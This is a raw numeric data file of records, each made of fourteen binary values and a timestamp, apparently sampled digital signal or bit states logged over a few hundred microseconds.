1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440480e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440504e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440532e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440556e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440580e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440604e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440632e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440652e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440680e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440704e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440732e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440756e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440780e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440804e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440832e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440860e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440884e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440908e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.5440932e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.5440956e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5565152e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.5565356e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5565380e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,1.5565404e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5565436e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5565716e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5565740e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5565768e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5565792e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.5565796e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.5565820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.5565844e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.5565868e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.5565892e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.5565916e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.5565940e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5565948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5565984e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5565996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566068e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.5566072e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566076e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566092e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566116e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566140e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566168e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566172e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566192e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566220e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566268e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566296e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566316e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566324e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566368e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566392e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566400e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566444e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566448e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566492e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566516e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566540e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566568e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566592e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566620e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566668e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566692e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566716e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566740e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566768e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566792e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566820e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566868e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5566892e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5566916e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566924e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566940e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5566968e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5566992e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567020e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5567044e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567076e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567116e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567140e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567168e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567192e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567268e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567296e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567320e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567496e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567520e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567544e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567596e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567600e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5567644e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567668e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567720e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567820e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567824e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5567868e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567896e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5567900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5567904e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5567920e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5567948e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5567996e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568028e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568096e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568120e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568148e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568172e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5568220e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568268e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568292e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568320e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568348e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5568372e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568404e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568468e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568520e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568644e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568652e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5568668e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5568696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568700e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568720e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568744e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568868e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568892e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568920e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568948e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5568972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5568996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569096e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569100e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5569148e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569172e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5569196e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569228e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569244e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569268e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569296e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569320e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569344e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569372e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5569420e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569496e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569520e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569548e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569572e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569596e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569644e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569652e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5569696e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5569720e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569728e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569748e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569772e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569820e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569868e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569896e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569920e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5569972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5569996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570020e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.5570024e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570028e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570068e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570096e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5570100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570104e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570120e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570244e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570252e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570296e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570320e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570348e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570372e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5570376e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570380e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570396e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570420e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570444e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570468e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570496e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570520e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570524e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570572e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570604e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570620e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570644e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570652e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570696e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570720e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570728e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570772e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570844e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570868e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570876e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5570896e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5570920e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5570924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570928e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570948e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5570972e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5570996e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571020e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571044e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571096e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571120e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571148e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.5571172e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571176e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571196e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571220e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571244e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571268e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571296e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571320e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5571324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571328e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571444e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571452e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571496e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571520e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571548e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571572e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5571576e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571580e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571596e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571620e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571644e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571668e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571696e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571720e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571724e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5571772e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5571796e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571804e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571820e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571868e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571892e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571920e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571948e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5571972e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5571996e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572020e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572044e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572068e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572096e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572120e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572148e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572172e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572196e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572220e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572244e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572268e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572296e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572320e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572348e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572372e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572396e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572420e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572444e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572468e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572496e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572540e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572564e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572588e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572616e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5572640e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5572668e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697056e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697260e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,1.5697292e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697316e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5697604e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697628e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5697652e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697676e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5697700e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697728e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5697752e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,1.5697780e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,1.5697800e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,1.5697828e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,1,1.5697876e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5697888e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5697900e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,1.5697908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5697912e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5697928e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5697952e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5697980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698000e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698076e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698100e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698128e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698152e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698176e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698200e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5698204e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5698252e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5698276e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698300e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698328e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5698332e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5698380e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5698400e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698412e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698428e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698452e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698476e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698500e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698528e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698552e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698604e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698628e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698652e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698676e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698700e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698728e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698752e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698804e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698828e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698876e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698900e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5698928e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5698952e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5698956e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,1.5699004e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,1.5699028e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699036e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699052e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699076e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699100e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699128e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699152e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,1.5699204e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,1.5699228e-02 